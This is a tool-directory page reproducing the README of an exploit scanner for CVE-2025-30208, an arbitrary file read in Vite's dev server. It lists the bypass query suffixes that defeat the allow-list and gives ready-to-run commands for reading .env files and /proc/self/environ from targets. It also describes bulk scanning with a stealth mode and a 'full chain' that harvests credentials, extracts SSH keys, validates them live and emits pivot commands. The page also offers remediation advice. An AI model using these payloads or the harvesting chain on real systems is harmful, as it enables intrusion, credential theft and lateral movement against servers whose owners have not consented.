Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-30208 — Exploit scanner for CVE-2025-30208 (Vite arbitrary file read) with multi-variant bypass detection, credential harvesting, SSH key extraction, and structured reporting for authorized penetration testing. | Kitploit
Tools/GitHubGitHub/hazavvip/cve-2025-30208
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPenetration Testing
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

Exploit scanner for CVE-2025-30208 (Vite arbitrary file read) with multi-variant bypass detection, credential harvesting, SSH key extraction, and structured reporting for authorized penetration testing.

View Repository
224 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-30208 — Vite Arbitrary File Read · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
Severity: CVSS 5.3 Medium (network-accessible dev server)

⚠ For authorized security engagements only.
Unauthorized use against systems you do not own or have explicit written permission to test is illegal.


Description

Vite's dev server allows serving arbitrary files from the host filesystem via /@fs/ requests.
A missing query-string sanitisation check in affected versions lets an attacker append specially crafted suffixes to bypass the allow-list and read any file the process can access — including .env files, SSH private keys, cloud credentials, and /proc entries.


Affected Versions

BranchLast vulnerablePatched
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

Bypass Variants

NameSuffix / QueryDescription
raw???raw??Trailing ?? breaks rawRE
import&raw???import&raw??ES module + raw combined
raw??raw?Single trailing ?
url&raw???url&raw??URL mode combined
raw&url???raw&url??Reversed parameter order
import&?raw?import&?rawMalformed import prefix
sec-fetch?raw + Sec-Fetch headerBrowser script context
raw-encoded?raw%3f%3fURL-encoded separators
double-slash?raw??/Double-slash suffix bypass (v5)
pct-all%3fraw%3f%3fFully percent-encoded query (v5)
raw-hash?raw??#Fragment anchor bypass (v5)
wasm-init?inline=1.wasm?initCVE-2025-31125 sibling (wasm init)

Installation

pip install requests
# or
pip install -r requirements.txt

Usage

Single target — full scan

python main.py -t https://target.com

Full exploitation chain (live credential validation, default behavior)

python main.py -t https://target.com --full-chain --output /tmp/report

Read a specific file

python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

Stealth mode (randomised delays) + upstream proxy

python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

Bulk scan from a target list

python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

Pipe-friendly output (no ANSI codes)

python main.py -t https://target.com --no-color | tee scan.log

Version

python main.py --version

Run as a package

python -m cve30208 -t https://target.com

CLI Reference

FlagDefaultDescription
-t/--target—Single target URL
-l/--lists—File containing one target per line
--stealthoffAdd random delays between requests
--proxy—HTTP/HTTPS proxy (http://host:port)
--timeout10Per-request timeout in seconds
--verifyoffEnable TLS certificate verification
--file—Read a specific path on the target host
--save—Save --file content to a local path
--full-chainonRun full exploitation chain (live validation is default)
--output—Write JSON + Markdown report to this base path
--workers10Parallel workers for bulk scan
--portssee belowComma-separated ports to probe in bulk mode
--no-color/--plainoffDisable ANSI colour codes
--safe-modeoffRedact secret values in terminal output
--show-secretsoffShow full terminal secrets (overrides --safe-mode)
--version—Print version and exit

Default bulk-scan ports: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


Output

When --output /tmp/report is specified the scanner writes:

  • /tmp/report.json — machine-readable structured findings
  • /tmp/report.md — human-readable Markdown report

The bulk scan always prints VULN_COUNT=N on the last line for easy shell scripting:

python main.py -l targets.txt | grep '^VULN_COUNT='

Single-target scans print SCAN_STATUS=VULNERABLE|NOT_VULNERABLE at the end for automation.


Architecture (v5)

cve30208/
├── __init__.py      — public API surface
├── __main__.py      — python -m cve30208 entry point
├── constants.py     — BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan constants
├── ui.py            — ANSI colour codes, Spin/NullSpin, terminal helpers
├── utils.py         — shared helpers (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (live credential validation)
│                      includes a check registry for easier extension
├── report.py        — save_report(), make_md()
└── scanner.py       — FR/R dataclasses, Scanner, bulk_scan(), main()
main.py              — backwards-compatibility shim
requirements.txt

Deduplication

The scanner automatically suppresses repeated artefacts so that output stays clean even when HOME equals /root or the same secret appears in multiple files:

LayerMechanism
Filesystem readsstage_fs normalizes the SSH-key base list with dict.fromkeys and drops duplicate paths from the reads queue before any output is produced.
File savesScanner._save checks a per-scan _seen_file_paths set; duplicate paths return the already-stored FR without re-appending to r.files.
SecretsScanner._save deduplicates r.secrets globally by (name, value) across all files; within-file dedup is handled separately in scan_secrets.
SSH keysstage_ssh collapses keys with the same PEM signature (first _PEM_SIG_LEN bytes) that appear across multiple source files.
Pivot commandsPivot blocks are keyed by (key_source, host, port); identical combinations are printed only once.

The summary line reports how many files, secrets, and SSH keys were suppressed as duplicates, e.g.:

  deduped     2 file(s), 4 credential(s), 1 SSH key(s) suppressed as duplicates

Remediation

  1. Upgrade Vite to the patched version for your branch (see table above).
  2. Never start the Vite dev server with --host 0.0.0.0 on untrusted networks.
  3. Rotate all secrets that were potentially exposed (API keys, DB passwords, SSH keys).
  4. Audit .env files and remove unnecessary secrets from the project.

Legal

This tool is provided for authorized penetration testing and security research only.
By using this tool you agree that you have explicit written authorization to test the target systems.
The authors accept no liability for any misuse or damage caused by this software.


CVE-2025-30208 PoC v5

JSON schema note

Download Tool